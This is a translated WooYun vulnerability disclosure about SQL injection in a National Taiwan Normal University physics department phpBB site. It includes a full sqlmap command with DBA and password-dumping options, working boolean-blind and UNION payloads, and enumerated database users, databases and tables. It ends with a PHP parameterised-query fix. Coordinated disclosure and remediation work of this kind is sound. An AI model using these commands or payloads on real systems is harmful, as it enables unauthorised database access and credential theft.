
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0153706

Title: SQL injection vulnerability in the Department of Physics, National Taiwan Normal University (國立臺灣師範大學) (DBA privileges; root password disclosure; 47 databases; 111 tables; millions of user log records exposed) (Taiwan region)

Vendor: 國立臺灣師範大學 (National Taiwan Normal University)

Author: 路人甲

Submitted: 2015-11-12 08:22

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: handed over to a third-party partner organisation (HITCON, Taiwan internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-11-12: Details sent to the vendor; awaiting the vendor's response
2015-11-20: Vendor confirmed the issue; details visible to the vendor only
2015-11-30: Details disclosed to core white hats and domain experts
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

The Department of Physics, National Taiwan Normal University has a SQL injection vulnerability (DBA privileges; root password disclosure; 47 databases; 111 tables; millions of user log records exposed).

Detailed description:

URL: http://**.**.**.**/demolab/phpBB/viewtopic.php?topic=23712

python sqlmap.py -u "http://**.**.**.**/demolab/phpBB/viewtopic.php?topic=23712" -p topic --technique=BU --random-agent --threads=10 --current-user --is-dba --users --passwords --dbs


back-end DBMS: MySQL 5
Database: phpBB
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| searchkey | 1450190 |
| key_usage | 1122007 |
| searchlog | 833170 |
| referer | 794399 |
| key_pair_post | 781424 |
| userslog20140930 | 745161 |
| iplog | 707156 |
| userslog | 601349 |
| userslogrobot | 461548 |

Proof of vulnerability:

---
Parameter: topic (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: topic=23712) AND 9549=9549 AND (4804=4804
Type: UNION query
Title: MySQL UNION query (19) - 6 columns
Payload: topic=-2872) UNION ALL SELECT 19,CONCAT(0x716b7a7171,0x4b4f4c66496b6b56624c4f456d487878614a6b61647549566a6647484a724b6f6f504c56704b5177,0x716b6a7171),19,19,19,19#
---
web server operating system: Linux Debian
web application technology: PHP 5.3.6, Apache 2.2.17
back-end DBMS: MySQL >= 5.0.0
current user: 'fkh@localhost'
current user is DBA: True
database management system users [8]:
[*] 'apho'@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'fkh'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'physicsweb'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'node2'
database management system users password hashes:
available databases [47]:
[*] ajax
[*] anndb
[*] apache
[*] apho
[*] Demolab
[*] demolab
[*] drupal
[*] drupal6
[*] ejsdl
[*] ejslauncher
[*] ejsweb
[*] home
[*] information_schema
[*] javadoc
[*] joomla
[*] mdl_physlet
[*] moodle
[*] mysql
[*] mywiki
[*] ocs
[*] osejs
[*] phpBB
[*] phpBB2
[*] phpBBlog
[*] phpBBsaved
[*] phpmyadmin
[*] phpmyadmin2
[*] phptree
[*] physicsweb
[*] physlet_physics
[*] physlets
[*] phytest
[*] play
[*] playsun
[*] playying
[*] saved
[*] smf
[*] svg
[*] test
[*] tiki
[*] tmp
[*] visitors
[*] weave
[*] wiki
[*] wiki1_15_1
[*] wikidb
[*] wikidrupal
current database: 'phpBB'
Database: phpBB
[111 tables]
+--------------------+
| access |
| banlist |
| catagories |
| circuitsimulator |
| cmap |
| colors |
| config |
| creditlog |
| demoExps |
| demolabonline |
| disallow |
| ejsuser_download |
| ejsweb |
| ejsweblog |
| ejsxml |
| enjoywiki |
| explorec |
| favortopics |
| file_explorer |
| fkh_q |
| fkh_qlog |
| forum_access |
| forum_mods |
| forums |
| googlegetlog |
| headermetafooter |
| heq |
| imgurl |
| iplog |
| jacob |
| jacobui |
| key_log |
| key_log_post |
| key_map |
| key_map_time |
| key_pair |
| key_pair_post |
| key_related_log |
| key_topic |
| key_usage |
| key_word |
| log_geo |
| logip |
| math_tex |
| moodleurl |
| notes |
| notify |
| ntnujava_note |
| ntnujavazip |
| osejs |
| phy_translation |
| physicslist |
| physicslisttopic |
| physicsterms |
| posts |
| posts_downloadfile |
| posts_misconcept |
| posts_note |
| postsfkh |
| priv_msgs |
| priv_msgs_no |
| problem |
| puzzlelog |
| quiz |
| quizlog |
| ranks |
| referer |
| replychk |
| resource |
| sci2003 |
| search_keywords |
| searchkey |
| searchlog |
| sessions |
| sig2009 |
| simlab |
| simulations |
| simulations_elog |
| sites |
| siteurl |
| siteurlerror |
| smiles |
| snapshotejs |
| sudokulog |
| svg |
| themes |
| topic_keyword |
| topic_state |
| topic_statedata |
| topics |
| tree |
| tree_elements |
| tree_topic |
| tree_user |
| twip |
| user_hacker_log |
| user_upload |
| users |
| userslog |
| userslog20140930 |
| usersloginlog |
| usersloginout |
| userslogrobot |
| webdata |
| whosonline |
| wikilink |
| wikititle |
| wikititlecount |
| words |
| youtube |
| youtube_note |
+--------------------+
Database: phpBB
Table: user_hacker_log
[7 columns]
+----------+------------------+
| Column | Type |
+----------+------------------+
| time | int(10) unsigned |
| email | varchar(64) |
| id | int(10) unsigned |
| pass | varchar(40) |
| passmd5 | varchar(40) |
| type | tinyint(4) |
| username | varchar(40) |
+----------+------------------+
Database: phpBB
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| searchkey | 1450190 |
| key_usage | 1122007 |
| searchlog | 833170 |
| referer | 794399 |
| key_pair_post | 781424 |
| userslog20140930 | 745161 |
| iplog | 707156 |
| userslog | 601349 |
| userslogrobot | 461548 |
| key_map | 398123 |
| logip | 324443 |
| key_log_post | 265103 |
| enjoywiki | 141244 |
| key_pair | 138177 |
| posts | 134764 |
| usersloginlog | 118073 |
| key_log | 113843 |
| user_hacker_log | 70410 |
| fkh_qlog | 58391 |
| users | 42831 |
| phy_translation | 33145 |
| key_word | 30139 |
| replychk | 26202 |
| topics | 25874 |
| physicsterms | 24331 |
| key_related_log | 22981 |
| key_topic | 20552 |
| priv_msgs | 19589 |
| ntnujavazip | 17662 |
| topic_state | 15709 |
| siteurlerror | 13645 |
| siteurl | 13644 |
| googlegetlog | 12901 |
| log_geo | 12641 |
| usersloginout | 9065 |
| math_tex | 7016 |
| user_upload | 5145 |
| postsfkh | 4804 |
| sites | 4517 |
| physicslisttopic | 4012 |
| notify | 3877 |
| creditlog | 2822 |
| sudokulog | 2471 |
| sci2003 | 1998 |
| ejsxml | 1605 |
| favortopics | 1514 |
| whosonline | 1513 |
| topic_statedata | 1397 |
| demolabonline | 1387 |
| osejs | 1219 |
| wikilink | 981 |
| snapshotejs | 815 |
| demoExps | 626 |
| webdata | 478 |
| problem | 457 |
| key_map_time | 438 |
| forum_access | 390 |
| fkh_q | 378 |
| ntnujava_note | 343 |
| tree | 292 |
| tree_topic | 242 |
| sig2009 | 240 |
| colors | 220 |
| forum_mods | 201 |
| file_explorer | 160 |
| twip | 148 |
| forums | 143 |
| ejsweblog | 131 |
| physicslist | 125 |
| puzzlelog | 72 |
| notes | 67 |
| simulations | 67 |
| ejsweb | 47 |
| jacob | 47 |
| posts_note | 40 |
| simulations_elog | 40 |
| wikititlecount | 38 |
| smiles | 32 |
| banlist | 28 |
| priv_msgs_no | 22 |
| catagories | 19 |
| wikititle | 17 |
| posts_downloadfile | 14 |
| topic_keyword | 14 |
| jacobui | 10 |
| tree_elements | 10 |
| cmap | 7 |
| resource | 7 |
| access | 5 |
| heq | 5 |
| ranks | 5 |
| quiz | 4 |
| themes | 4 |
| disallow | 3 |
| explorec | 3 |
| moodleurl | 3 |
| sessions | 3 |
| circuitsimulator | 2 |
| posts_misconcept | 2 |
| youtube | 2 |
| config | 1 |
| headermetafooter | 1 |
| svg | 1 |
| tree_user | 1 |
| youtube_note | 1 |
+--------------------+---------+

Remediation:

Deploy a WAF.
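A WAF filters requests but leaves the injectable query in place; the durable fix is in the application code. The block below is an added example, not phpBB's or the reporter's code: it reconstructs, hypothetically, the pattern implied by the payload's `23712)` prefix (the `topic` value pasted into a parenthesised WHERE clause) and shows the validated, parameterised replacement. The table and column names (`topics`, `topic_id`, `topic_title`) and the account name are assumptions.

```php
<?php
// Added example, not phpBB's own source. find_topic_unsafe() is a hypothetical
// reconstruction of the pattern the payload "topic=23712) AND ..." points to:
// the GET value is concatenated into a WHERE clause that closes with ")".
// Table and column names (topics, topic_id, topic_title) are assumptions.

/** Vulnerable pattern, kept only for contrast: the SQL text is built from user input. */
function find_topic_unsafe(mysqli $db, $topic)
{
    $sql = "SELECT topic_id, topic_title FROM topics WHERE (topic_id = $topic)";
    $result = $db->query($sql);
    return $result ? $result->fetch_assoc() : null;
}

/** Hardened: validate the type first, then bind the value so the SQL text never changes. */
function find_topic_safe(mysqli $db, $topic)
{
    // A topic id is a positive integer; any other shape (for example a value that
    // carries a closing parenthesis and a boolean condition) is rejected here.
    $id = filter_var($topic, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    if ($id === false) {
        error_log('viewtopic: rejected non-integer topic value'); // hook for detection
        return null;
    }
    $stmt = $db->prepare('SELECT topic_id, topic_title FROM topics WHERE topic_id = ?');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = null;
    $stmt->bind_result($topicId, $title);   // works without the mysqlnd-only get_result()
    if ($stmt->fetch()) {
        $row = array('topic_id' => $topicId, 'topic_title' => $title);
    }
    $stmt->close();
    return $row;
}

// The connection should use an account limited to the phpBB database (SELECT,
// INSERT, UPDATE, DELETE on phpBB.*) rather than the DBA-level account the report
// found; a residual injection then cannot reach mysql.user or the other 46 databases.
// 'phpbb_app' and the password are placeholders.
$db = new mysqli('localhost', 'phpbb_app', '<password placeholder>', 'phpBB');
$db->set_charset('utf8mb4');
$topic = isset($_GET['topic']) ? $_GET['topic'] : '';
$row = find_topic_safe($db, $topic);
```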

Copyright notice: when reproducing, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 18

Confirmed: 2015-11-20 06:54

Vendor reply:

Thank you for the report.

Latest status:

None yet